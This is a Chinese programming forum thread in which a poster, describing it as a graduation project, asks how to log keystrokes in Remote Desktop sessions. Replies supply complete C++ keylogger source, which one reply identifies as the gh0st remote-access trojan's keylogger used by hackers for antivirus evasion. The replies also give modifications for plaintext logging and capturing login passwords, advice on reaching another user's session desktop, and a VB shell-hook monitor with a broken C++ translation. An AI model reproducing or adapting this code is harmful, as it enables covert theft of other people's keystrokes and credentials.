本人毕业设计写一个键盘记录，请问如何记录远程桌面连接的键盘按键

raw input
注册下输入设备再在过程函数里面处理WM_INPUT消息就OK了话说09年还是10年就看到有网友说QQ游戏的帐号、密码可以获取没想到2011了还是没有改善
接收QQ登录框的输入消息时倒是有消息干扰不过驱动级别还是能够获取
http://www.socool-soft.com/post/25.html

我复制一大段代码给LZ，可以参考参考，这是一个线程
__beginthread ( KeyLogger);//
即可。
代码可以复制到编辑器里，然后就可以看好格式了。
void SaveToFile(CHAR *lpBuffer)
{ CHAR strRecordFile[MAX_PATH];
GetSystemDirectory(strRecordFile, sizeof(strRecordFile));
lstrcat(strRecordFile, "\\keylog.dat");
HANDLE hFile = CreateFile(strRecordFile, GENERIC_WRITE, FILE_SHARE_WRITE,
NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
DWORD dwBytesWrite = 0;
DWORD dwSize = GetFileSize(hFile, NULL);
if (dwSize < 1024 * 1024 * 500)
SetFilePointer(hFile, 0, 0, FILE_END);
// 加密
int nLength = lstrlen(lpBuffer);
LPBYTE lpEncodeBuffer = new BYTE[nLength];
for (int i = 0; i < nLength; i++)
lpEncodeBuffer[i] = lpBuffer[i] ^ 98;
WriteFile(hFile, lpEncodeBuffer, lstrlen(lpBuffer), &dwBytesWrite, NULL);
CloseHandle(hFile);

return ;
}
char *LowerCase[]={
"[BACKSPACE]",// "b",
"[Enter]",//    "e",
"[ESC]",
"[F1]",
"[F2]",
"[F3]",
"[F4]",
"[F5]",
"[F6]",
"[F7]",
"[F8]",
"[F9]",
"[F10]",
"[F11]",
"[F12]",
"`",
"1",
"2",
"3",
"4",
"5",
"6",
"7",
"8",
"9",
"0",
"-",
"=",
"[TAB]",
"q",
"w",
"e",
"r",
"t",
"y",
"u",
"i",
"o",
"p",
"[",
"]",
"a",
"s",
"d",
"f",
"g",
"h",
"j",
"k",
"l",
";",
"'",
"z",
"x",
"c",
"v",
"b",
"n",
"m",
",",
".",
"/",
"\\",
"[CTRL]",
"[WIN]",
" ",
"[WIN]",
// "[Print Screen]",
"[Scroll Lock]",
"[Insert]",
"[Home]",
// "[PageUp]",
"[Del]",
"[End]",
// "[PageDown]",
"[Left]",
"[UP]",
"[Right]",
"[Down]",
"[Num Lock]",
"/",
"*",
"-",
"+",
"0",
"1",
"2",
"3",
"4",
"5",
"6",
"7",
"8",
"9",
".",};char *UpperCase[]={
"[BACKSPACE]",// "b",
"[Enter]",//    "e",
"[ESC]",
"[F1]",
"[F2]",
"[F3]",
"[F4]",
"[F5]",
"[F6]",
"[F7]",
"[F8]",
"[F9]",
"[F10]",
"[F11]",
"[F12]",
"~",
"!",
"@",
"#",
"$",
"%",
"^",
"&",
"*",
"(",
")",
"_",
"+",
"[TAB]",
"Q",
"W",
"E",
"R",
"T",
"Y",
"U",
"I",
"O",
"P",
"{",
"}",
"A",
"S",
"D",
"F",
"G",
"H",
"J",
"K",
"L",
":",
"\"",
"Z",
"X",
"C",
"V",
"B",
"N",
"M",
"<",
">",
"?",
"│",
"[CTRL]",
"[WIN]",
" ",
"[WIN]",
// "[Print Screen]",
"[Scroll Lock]",
"[Insert]",
"[Home]",
// "[PageUp]",
"[Del]",
"[End]",
// "[PageDown]",
"[Left]",
"[Up]",
"[Right]",
"[Down]",
"[Num Lock]",
"/",
"*",
"-",
"+",
"0",
"1",
"2",
"3",
"4",
"5",
"6",
"7",
"8",
"9",
".",};int SpecialKeys[]={
8,
13,
27,
112,
113,
114,
115,
116,
117,
118,
119,
120,
121,
122,
123,
192,
49,
50,
51,
52,
53,
54,
55,
56,
57,
48,
189,
187,
9,
81,
87,
69,
82,
84,
89,
85,
73,
79,
80,
219,
221,
65,
83,
68,
70,
71,
72,
74,
75,
76,
186,
222,
90,
88,
67,
86,
66,
78,
77,
188,
190,
191,
220,
17,
91,
32,
92,
// 44,
145,
45,
36,
// 33,
46,
35,
// 34,
37,
38,
39,
40,
144,
111,
106,
109,
107,
96,
97,
98,
99,
100,
101,
102,
103,
104,
105,
110,
};HWND PreviousFocus=NULL;
CHAR WindowCaption[1024]={0};
HWND hFocus = NULL;
BOOL IsWindowsFocusChange()
{

// memset(hFocus,0,sizeof(hFocus));
memset(WindowCaption,0,sizeof(WindowCaption));
hFocus = GetForegroundWindow();
GetWindowText(hFocus,WindowCaption,sizeof(WindowCaption));
BOOL ReturnFlag = FALSE;
CHAR temp[1024]={0};
if (hFocus == PreviousFocus)
{ }
else
{
if (lstrlen(WindowCaption) > 0)
{
SYSTEMTIME   s;
GetLocalTime(&s);
wsprintf(temp,"\r\n[标题:] %s\r\n[时间:]%d-%d-%d  %d:%d:%d\r\n",WindowCaption,s.wYear,s.wMonth,s.wDay,s.wHour,s.wMinute,s.wSecond);
SaveToFile(temp);
memset(temp,0,sizeof(temp));
memset(WindowCaption,0,sizeof(WindowCaption));
ReturnFlag=TRUE;
}
PreviousFocus = hFocus;
}
return ReturnFlag;
}DWORD WINAPI KeyLogger(LPARAM lparam)
{
int bKstate[256] = {0};
int i,x;
CHAR KeyBuffer[600];
int state;
int shift;
memset(KeyBuffer,0,sizeof(KeyBuffer));

while(TRUE)
{
Sleep(8);
if (lstrlen(KeyBuffer) != 0)
{
if (IsWindowsFocusChange())
{
// lstrcat(KeyBuffer,"\r\n");
lstrcat(KeyBuffer,"\n");
SaveToFile("[内容:]");
SaveToFile(KeyBuffer);
memset(KeyBuffer,0,sizeof(KeyBuffer));
}
else
{ lstrcat(KeyBuffer,"\n");
SaveToFile(KeyBuffer);
memset(KeyBuffer,0,sizeof(KeyBuffer)); }
}

for(i=0;i<92;i++)
{
shift = GetKeyState(VK_SHIFT);
x = SpecialKeys[ i ];
if (GetAsyncKeyState(x) & 0x8000)
{

if (((GetKeyState(VK_CAPITAL) != 0) && (shift > -1) && (x > 64) && (x < 91))) //Caps Lock And Shift Is Not Pressed
{
bKstate[x] = 1;
}
else
if (((GetKeyState(VK_CAPITAL) != 0) && (shift < 0) && (x > 64) && (x < 91))) //Caps Lock And Shift Is Pressed
{
bKstate[x] = 2;
}
else
if (shift < 0)
{
bKstate[x] = 3;
}
else
bKstate[x] = 4;
}
else
{
if (bKstate[x] != 0)
{
state = bKstate[x];
bKstate[x] = 0;
if (x == 8)
{
/* KeyBuffer[lstrlen(KeyBuffer) - 1] = 0;
continue;*///记录退格键
lstrcat(KeyBuffer,"[BACKSPACE]");
SaveToFile(KeyBuffer);
memset(KeyBuffer,0,sizeof(KeyBuffer));
continue;
}
else
if (lstrlen(KeyBuffer) > 550)
{
SaveToFile(KeyBuffer);
memset(KeyBuffer,0,sizeof(KeyBuffer));
continue;
}
else
if (x == 13)
{
/*if (lstrlen(KeyBuffer) == 0)
{
continue;
}*///不去掉的话 Enter无法记录
lstrcat(KeyBuffer,"<Enter>\r\n");
SaveToFile(KeyBuffer);
memset(KeyBuffer,0,sizeof(KeyBuffer));
continue;
}
else
{
if ((state%2) == 1)
{
lstrcat(KeyBuffer,(CHAR *)UpperCase[ i ]);

}
else
if ((state%2) == 0)
{
lstrcat(KeyBuffer,(CHAR *)LowerCase[ i ]);
}
}
}
}
}
}
return 0;
}

原始输入说明
http://blog.csdn.net/qq752923276/archive/2011/05/01/6382355.aspx

在远程桌面的那个桌面中运行你的程序安装钩子
这个不现实，远程桌面肯定是没有权限安装钩子的
raw input 当输入字符很快的时候就获取不到了还有你给的代码是ring0下的我只要ring3下面的不要使用驱动
xiaopoy的代码在远程登录界面是记录不到的

这段代码谁翻译成C啊翻译了就结贴给分，谢谢了
Attribute VB_Name = "Module1"
Option ExplicitPrivate Declare Function RegisterShellHook Lib "Shell32" Alias "#181" (ByVal hwnd As Long, ByVal nAction As Long) As Long 'use in 98
Private Declare Function RegisterShellHookWindow Lib "user32" (ByVal hwnd As Long) As Long  'use in NT5
Private Declare Function RegisterWindowMessage Lib "user32" Alias "RegisterWindowMessageA" (ByVal lpString As String) As Long
Private Declare Function SetWindowLong Lib "user32" Alias "SetWindowLongA" (ByVal hwnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
Private Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
Private Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" (ByVal lpPrevWndFunc As Long, ByVal hwnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Private Declare Function RegisterServiceProcess Lib "kernel32" (ByVal dwProcessID As Long, ByVal dwType As Long) As Long
'Powered by barenx
'Private Const HSHELL_WINDOWCREATED = 1 ' 系统级的窗体被创建
'Private Const HSHELL_WINDOWDESTROYED = 2 ' 系统级的窗体即将被关闭
'Private Const HSHELL_ACTIVATESHELLWINDOW = 3 ' SHELL 的主窗体将被激活（本例未用）
'Private Const HSHELL_WINDOWACTIVATED = 4 ' 系统级的窗体被激活
'Private Const HSHELL_GETMINRECT = 5 ' 窗体被最大化或最小化（本例未用）
'Private Const HSHELL_REDRAW = 6 ' Windows 任务栏被刷新（本例未用）
'Private Const HSHELL_TASKMAN = 7 ' 任务列表的内容被选中（本例未用）
'Private Const HSHELL_LANGUAGE = 8 ' 中英文切换或输入法切换（本例未用）
'MSDN
'wParam lParam
'HSHELL_GETMINRECT A pointer to a SHELLHOOKINFO structure.
'HSHELL_WINDOWACTIVATEED The HWND handle of the activated window.
'HSHELL_RUDEAPPACTIVATEED The HWND handle of the activated window.
'HSHELL_WINDOWREPLACING The HWND handle of the window replacing the top-level window.
'HSHELL_WINDOWREPLACED The HWND handle of the window being replaced.
'HSHELL_WINDOWCREATED The HWND handle of the window being created.
'HSHELL_WINDOWDESTROYED The HWND handle of the top-level window being destroyed.
'HSHELL_ACTIVATESHELLWINDOW Not used.
'HSHELL_TASKMAN Can be ignored.
'HSHELL_REDRAW The HWND handle of the window that needs to be redrawn.
'HSHELL_FLASH The HWND handle of the window that needs to be flashed.
'HSHELL_ENDTASK The HWND handle of the window that should be forced to exit.
'HSHELL_APPCOMMAND The APPCOMMAND which has been unhandled by the application or other hooks. See WM_APPCOMMAND and use the message cracker GET_APPCOMMAND_LPARAM(lParam) to crack this parameter.
Private Const HSHELL_WINDOWCREATED = 1
Private Const HSHELL_WINDOWDESTROYED = 2
Private Const HSHELL_ACTIVATESHELLWINDOW = 3
Private Const HSHELL_WINDOWACTIVATED = 4
Private Const HSHELL_GETMINRECT = 5
Private Const HSHELL_REDRAW = 6
Private Const HSHELL_TASKMAN = 7
Private Const HSHELL_LANGUAGE = 8
Private Const HSHELL_SYSMENU = 9
Private Const HSHELL_ENDTASK = 10
Private Const HSHELL_ACCESSIBILITYSTATE = 11
Private Const HSHELL_APPCOMMAND = 12
Private Const HSHELL_WINDOWREPLACED = 13
Private Const HSHELL_WINDOWREPLACING = 14
Private Const HSHELL_HIGHBIT = &H8000
Private Const HSHELL_FLASH = (HSHELL_REDRAW Or HSHELL_HIGHBIT)
Private Const HSHELL_RUDEAPPACTIVATED = (HSHELL_WINDOWACTIVATED Or HSHELL_HIGHBIT)
Private Const GWL_WNDPROC = -4  ' 该索引用来创建窗口类的子类
Private Shell_Hook_Msg_ID As Long
Private LogWinOldProc As Long
Private LogControl As Control
Public Enum mLogControlType
    tListBox
    tTextBox
    tForm
    tPictureBox
    tLabel
End Enum
Private LogControlType As mLogControlType
Public Function RegLogWindow(ByVal hwnd As Long, ByVal mLogControl As Control, ByVal tLogControlType As mLogControlType) As Boolean
    On Error Resume Next
    LogControlType = tLogControlType
    Dim tmp As Long
    Shell_Hook_Msg_ID = RegisterWindowMessage("SHELLHOOK")
    RegLogWindow = Shell_Hook_Msg_ID
    RegLogWindow = RegLogWindow And (RegisterShellHook(hwnd, 1) Or RegisterShellHookWindow(hwnd))   ' 调用未公开的函数（进行注册）
    LogWinOldProc = SetWindowLong(hwnd, GWL_WNDPROC, AddressOf WindowProc)                          ' 实施拦截：在存储了原入口地址的同时，将新地址指向自定义的函数WindowProc
    'LogControl = mLogControl
    Set LogControl = mLogControl
End FunctionPublic Function UnRegLogWindow(hwnd As Long)
    Call RegisterShellHook(hwnd, 0)
    Call SetWindowLong(hwnd, GWL_WNDPROC, LogWinOldProc)
End FunctionPrivate Function WindowProc(ByVal hwnd As Long, ByVal uMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long            ' 回调函数
    Dim i As Long
    Dim m_Out_String As String
    Dim recTime As String
    Dim recParam As String
    If uMsg = Shell_Hook_Msg_ID Then
        recTime = Format$(Now(), "YY-MM-DD:HH-NN-SS ") & vbTab & " 0x" & _
                    Hex$(wParam) & vbTab & " 0x" & _
                    Hex$(lParam) & vbTab & " "
        Select Case wParam
            Case HSHELL_WINDOWCREATED
                m_Out_String = String$(260, vbNullChar)
                i = GetWindowText(lParam, m_Out_String, 260) ' 取窗体的标题
                If i > 0 Then m_Out_String = Left$(m_Out_String, i) Else m_Out_String = "UnNamed"
                m_Out_String = recTime & "HSHELL_WINDOWCREATED" & vbTab & " " & m_Out_String
            Case HSHELL_WINDOWDESTROYED
                m_Out_String = String$(260, vbNullChar)
                i = GetWindowText(lParam, m_Out_String, 260) ' 取窗体的标题
                If i > 0 Then m_Out_String = Left$(m_Out_String, i) Else m_Out_String = "UnNamed"
                m_Out_String = recTime & "HSHELL_WINDOWDESTROYED" & vbTab & " " & m_Out_String
            Case HSHELL_ACTIVATESHELLWINDOW
                m_Out_String = recTime & "HSHELL_ACTIVATESHELLWINDOW"
            Case HSHELL_WINDOWACTIVATED
                m_Out_String = String$(260, vbNullChar)
                i = GetWindowText(lParam, m_Out_String, 260) ' 取窗体的标题
                If i > 0 Then m_Out_String = Left$(m_Out_String, i) Else m_Out_String = "UnNamed"
                m_Out_String = recTime & "HSHELL_WINDOWACTIVATEED" & vbTab & " " & m_Out_String
            Case HSHELL_GETMINRECT
                m_Out_String = recTime & "HSHELL_GETMINRECT"
            Case HSHELL_REDRAW
                m_Out_String = String$(260, vbNullChar)
                i = GetWindowText(lParam, m_Out_String, 260) ' 取窗体的标题
                If i > 0 Then m_Out_String = Left$(m_Out_String, i) Else m_Out_String = "UnNamed"
                m_Out_String = recTime & "HSHELL_REDRAW" & vbTab & " " & m_Out_String
            Case HSHELL_TASKMAN
                m_Out_String = recTime & "HSHELL_TASKMAN"
            Case HSHELL_LANGUAGE
                m_Out_String = recTime & "HSHELL_LANGUAGE"
            Case HSHELL_SYSMENU
                m_Out_String = recTime & "HSHELL_SYSMENU"
            Case HSHELL_ENDTASK
                m_Out_String = String$(260, vbNullChar)
                i = GetWindowText(lParam, m_Out_String, 260) ' 取窗体的标题
                If i > 0 Then m_Out_String = Left$(m_Out_String, i) Else m_Out_String = "UnNamed"
                m_Out_String = recTime & "HSHELL_ENDTASK" & vbTab & " " & m_Out_String
            Case HSHELL_ACCESSIBILITYSTATE
                m_Out_String = recTime & "HSHELL_ACCESSIBILITYSTATE"
            Case HSHELL_APPCOMMAND
                m_Out_String = recTime & "HSHELL_APPCOMMAND"
            Case HSHELL_WINDOWREPLACED
                m_Out_String = String$(260, vbNullChar)
                i = GetWindowText(lParam, m_Out_String, 260) ' 取窗体的标题
                If i > 0 Then m_Out_String = Left$(m_Out_String, i) Else m_Out_String = "UnNamed"
                m_Out_String = recTime & "HSHELL_WINDOWREPLACED" & vbTab & " " & m_Out_String
            Case HSHELL_WINDOWREPLACING
                m_Out_String = String$(260, vbNullChar)
                i = GetWindowText(lParam, m_Out_String, 260) ' 取窗体的标题
                If i > 0 Then m_Out_String = Left$(m_Out_String, i) Else m_Out_String = "UnNamed"
                m_Out_String = recTime & "HSHELL_WINDOWREPLACING" & vbTab & " " & m_Out_String
            Case HSHELL_FLASH
                m_Out_String = String$(260, vbNullChar)
                i = GetWindowText(lParam, m_Out_String, 260) ' 取窗体的标题
                If i > 0 Then m_Out_String = Left$(m_Out_String, i) Else m_Out_String = "UnNamed"
                m_Out_String = recTime & "HSHELL_FLASH" & vbTab & " " & m_Out_String
            Case HSHELL_RUDEAPPACTIVATED
                m_Out_String = String$(260, vbNullChar)
                i = GetWindowText(lParam, m_Out_String, 260) ' 取窗体的标题
                If i > 0 Then m_Out_String = Left$(m_Out_String, i) Else m_Out_String = "UnNamed"
                m_Out_String = recTime & "HSHELL_RUDEAPPACTIVATEED" & vbTab & " " & m_Out_String
        End Select
        If Len(m_Out_String) Then Call m_WriteToControl(m_Out_String)
    Else
        WindowProc = CallWindowProc(LogWinOldProc, hwnd, uMsg, wParam, lParam)
    End If
End Function
Private Function m_WriteToControl(t_str As String)
    Select Case LogControlType
        Case tListBox
            LogControl.AddItem t_str
        Case tTextBox
            LogControl.Text = LogControl.Text & vbCrLf & t_str
        Case tForm, tPictureBox
            LogControl.Print t_str
        Case tLabel
            LogControl.Caption = t_str
    End Select
End Function

to #0,上面那段代码是gh0st里的键盘记录，这个是确定好使的，已经被小黑客们花钱买给做免杀的使用了接近5年了。虽然简单的防键盘记录截取就可以处理掉它了，但原理简单明了，是一直是被复制的代码。
所以我不大确定LZ在回复前有测试一下，这个只是死循环来判断按键是否有按下以截取的，不需要注入之类的可能被拦截的流程，所以很方便。
但是想截取登陆时账号密码的话，你确定用键盘记录而不用inline hook来截取?你可以这样改来试一下:
SaveToFile改成void SaveToFile(CHAR *lpBuffer)
{
    CHAR    strRecordFile[MAX_PATH]= "c:\\";

    lstrcatA(strRecordFile, "\\keylog.txt");
    HANDLE    hFile = CreateFileA(strRecordFile, GENERIC_WRITE, FILE_SHARE_WRITE,
        NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    DWORD dwBytesWrite = 0;
    DWORD dwSize = GetFileSize(hFile, NULL);
    if (dwSize < 1024 * 1024 * 500)
       SetFilePointer(hFile, 0, 0, FILE_END);
    int    nLength = lstrlenA(lpBuffer);    WriteFile(hFile, lpBuffer, lstrlenA(lpBuffer), &dwBytesWrite, NULL);
    CloseHandle(hFile);

    return ;
}
有三行是简单处理那个记录文件的，注释掉使它以明码保存。保存到C:\keylog.txt下。然后保存字节的地方,改成windows方式的换行，我个人的不喜欢那样每个字节都换一下行，所以也注释掉了:
            if (IsWindowsFocusChange())
            {                lstrcatA(KeyBuffer,"\r\n");
                SaveToFile("[内容:]");
                SaveToFile(KeyBuffer);
                memset(KeyBuffer,0,sizeof(KeyBuffer));
            }
            else
            {                SaveToFile(KeyBuffer);
                memset(KeyBuffer,0,sizeof(KeyBuffer));
            }但诚如Lactoferrin所说，这种方式比较低效。加分的话，那段VB我来翻译。 /:^]

恩，分已经到最高了，你翻译了我绝对给你补分。在3389中，那代码的确不能用桌面session都不同，

明白了。你想在3389上创建，然后记录另一个用户的输入。
但lactoferrin说的终归是一个问题，要是想记录另外的session里的键盘，得进到和它同一个桌面里才行。 /:^] CreateProcess ();中的LPSTARTUPINFO lpStartupInfo可以设置进程要被创建在桌面。
也可以用
HWINSTA OpenWindowStation(
    LPTSTR lpszWinSta, // name of the window station to open
    BOOL fInherit, // specifies whether returned handle is inheritable
    DWORD dwDesiredAccess // specifies access of returned handle
   );
配合
BOOL SetProcessWindowStation(
    HWINSTA hWinSta // handle of window station to assign to this process
   );
来设置桌面。我把这个翻译了过来，有点原因，这个是作业题 :P。
但没有查错，因为C++里没有那些控件什么的，流程可以用了:#include <windows.h>typedef LONG WINAPI (* RegisterShellHookProcPtr) (HWND hwnd, LONG nAction);RegisterShellHookProcPtr RegisterShellHook= GetProcAddress ( LoadLibraryA ( "Shell32.dll"), reinterpret_cast<LPSTR>(181));const unsigned int HSHELL_WINDOWCREATED = 1;
const unsigned int HSHELL_WINDOWDESTROYED = 2;
const unsigned int HSHELL_ACTIVATESHELLWINDOW = 3;
const unsigned int HSHELL_WINDOWACTIVATED = 4;
const unsigned int HSHELL_GETMINRECT = 5;
const unsigned int HSHELL_REDRAW = 6;
const unsigned int HSHELL_TASKMAN = 7;
const unsigned int HSHELL_LANGUAGE = 8;
const unsigned int HSHELL_SYSMENU = 9;
const unsigned int HSHELL_ENDTASK = 10;
const unsigned int HSHELL_ACCESSIBILITYSTATE = 11;
const unsigned int HSHELL_APPCOMMAND = 12;
const unsigned int HSHELL_WINDOWREPLACED = 13;
const unsigned int HSHELL_WINDOWREPLACING = 14;
const unsigned int HSHELL_HIGHBIT = 0x8000;
const unsigned int HSHELL_FLASH = (HSHELL_REDRAW | HSHELL_HIGHBIT);
const unsigned int HSHELL_RUDEAPPACTIVATED = (HSHELL_WINDOWACTIVATED | HSHELL_HIGHBIT);
const unsigned int GWL_WNDPROC = -4;//  ' 该索引用来创建窗口类的子类
LONG Shell_Hook_Msg_ID;
LONG LogWinOldProc;
Control LogControl;
enum mLogControlType
{
tListBox,
tTextBox,
tForm,
tPictureBox,
tLabel
};
mLogControlType LogControlType;extern long WindowProc(HWND  hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam);
void UnRegLogWindow (HWND hwnd);
BOOL RegLogWindow(HWND hwnd, Control mLogControl, mLogControlType tLogControlType)
{
__try
{
LogControlType = tLogControlType;
LONG temp;
Shell_Hook_Msg_ID = RegisterWindowMessage("SHELLHOOK");
RegLogWindow = Shell_Hook_Msg_ID;
RegLogWindow = RegisterShellHook(hwnd, 1);
RegLogWindow= RegisterShellHookWindow(hwnd);  // ' 调用未公开的函数（进行注册）
LogWinOldProc = SetWindowLong(hwnd, GWL_WNDPROC, WindowProc);                         // ' 实施拦截：在存储了原入口地址的同时，将新地址指向自定义的函数WindowProc
LogControl = mLogControl; }
__except (EXCEPTION_EXECUTE_HANDLER)
{
;
}
}void UnRegLogWindow (HWND hwnd)
{
RegisterShellHook(hwnd, 0);
SetWindowLong(hwnd, GWL_WNDPROC, LogWinOldProc);
}long WindowProc(HWND  hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam)//' 回调函数
{
LONG i;
CString m_Out_String;
CString recTime;
CString recParam;
if (Shell_Hook_Msg_ID==uMsg)
{
SYSTEMTIME temp_SystemTime;
GetSystemTime ( &temp_SystemTime);
recTime.Format( "%4d-%2d-%2d:%2d-%2d-%2d\t0x%x\t0x%x ", temp_SystemTime.wYear, temp_SystemTime.wMonth, temp_SystemTime.wDay,
temp_SystemTime.wHour, temp_SystemTime.wMinute, temp_SystemTime.wSecond
wParam, lParam); switch ( wParam)
{
case HSHELL_WINDOWCREATED:
m_Out_String.Empty();
i = GetWindowText(lParam, m_Out_String, 260);// ' 取窗体的标题
if (i > 0)
{
m_Out_String= m_Out_String.Left ( i);
}
else
{
m_Out_String = "UnNamed"
}
m_Out_String = recTime + "HSHELL_WINDOWCREATED" + "\t" + " " + m_Out_String;
break;
case HSHELL_WINDOWDESTROYED:
m_Out_String.Empty();
i = GetWindowText(lParam, m_Out_String, 260);// ' 取窗体的标题
if (i > 0)
{
m_Out_String= m_Out_String.Left ( i);
}
else
{
m_Out_String = "UnNamed"
}
m_Out_String = recTime + "HSHELL_WINDOWDESTROYED" + "\t" + " " + m_Out_String;
break;
case HSHELL_ACTIVATESHELLWINDOW:
m_Out_String = recTime + "HSHELL_ACTIVATESHELLWINDOW";
break;
case HSHELL_WINDOWACTIVATED:
m_Out_String.Empty();
i = GetWindowText(lParam, m_Out_String, 260);// ' 取窗体的标题
if (i > 0)
{
m_Out_String= m_Out_String.Left ( i);
}
else
{
m_Out_String = "UnNamed"
}
m_Out_String = recTime + "HSHELL_WINDOWACTIVATEED" + "\t" + " " + m_Out_String;
break;
case HSHELL_GETMINRECT:
m_Out_String = recTime+ "HSHELL_GETMINRECT"
break; case HSHELL_REDRAW:
m_Out_String.Empty();
i = GetWindowText(lParam, m_Out_String, 260);// ' 取窗体的标题
if (i > 0)
{
m_Out_String= m_Out_String.Left ( i);
}
else
{
m_Out_String = "UnNamed"
}
m_Out_String = recTime + "HSHELL_REDRAW" + "\t" + " " + m_Out_String;
break;
case HSHELL_TASKMAN:
m_Out_String = recTime+ "HSHELL_TASKMAN";
break;
case HSHELL_LANGUAGE:
m_Out_String = recTime+ "HSHELL_LANGUAGE";
break;
case HSHELL_SYSMENU:
m_Out_String = recTime "HSHELL_SYSMENU";
break;
case HSHELL_ENDTASK:
m_Out_String.Empty();
i = GetWindowText(lParam, m_Out_String, 260);// ' 取窗体的标题
if (i > 0)
{
m_Out_String= m_Out_String.Left ( i);
}
else
{
m_Out_String = "UnNamed"
}
m_Out_String = recTime + "HSHELL_ENDTASK" + "\t" + " " + m_Out_String;
break;
case HSHELL_ACCESSIBILITYSTATE:
m_Out_String = recTime+ "HSHELL_ACCESSIBILITYSTATE"
break;
case HSHELL_APPCOMMAND:
m_Out_String = recTime+ "HSHELL_APPCOMMAND"
break;
case HSHELL_WINDOWREPLACED:
m_Out_String.Empty();
i = GetWindowText(lParam, m_Out_String, 260);// ' 取窗体的标题
if (i > 0)
{
m_Out_String= m_Out_String.Left ( i);
}
else
{
m_Out_String = "UnNamed"
}
m_Out_String = recTime + "HSHELL_WINDOWREPLACED" + "\t" + " " + m_Out_String;
break; case HSHELL_WINDOWREPLACING:
m_Out_String.Empty();
i = GetWindowText(lParam, m_Out_String, 260);// ' 取窗体的标题
if (i > 0)
{
m_Out_String= m_Out_String.Left ( i);
}
else
{
m_Out_String = "UnNamed"
}
m_Out_String = recTime + "HSHELL_WINDOWREPLACING" + "\t" + " " + m_Out_String;
break;
case HSHELL_FLASH:
m_Out_String.Empty();
i = GetWindowText(lParam, m_Out_String, 260);// ' 取窗体的标题
if (i > 0)
{
m_Out_String= m_Out_String.Left ( i);
}
else
{
m_Out_String = "UnNamed"
}
m_Out_String = recTime + "HSHELL_FLASH" + "\t" + " " + m_Out_String;
break;
case HSHELL_RUDEAPPACTIVATED:
m_Out_String.Empty();
i = GetWindowText(lParam, m_Out_String, 260);// ' 取窗体的标题
if (i > 0)
{
m_Out_String= m_Out_String.Left ( i);
}
else
{
m_Out_String = "UnNamed"
}
m_Out_String = recTime + "HSHELL_RUDEAPPACTIVATEED" + "\t" + " " + m_Out_String;
break; } if (0!=m_Out_String.size ())
{
m_WriteToControl(m_Out_String);
} }
else
{
return CallWindowProc ( LogWinOldProc, hwnd, uMsg, wParam, lParam)
}
}
void m_WriteToControl(CString t_str)
{
switch ( LogControlType)
{ case tListBox:
LogControl.AddItem (t_str);
break;
case tTextBox:
LogControl.Text = LogControl.Text+ "\t"+ t_str;
break;
case tForm:
case tPictureBox:
LogControl.Print t_str;
break;
case tLabel:
LogControl.Caption = t_str;
break;
}
}

调试易

本人毕业设计写一个键盘记录，请问如何记录远程桌面连接的键盘按键

解决方案 »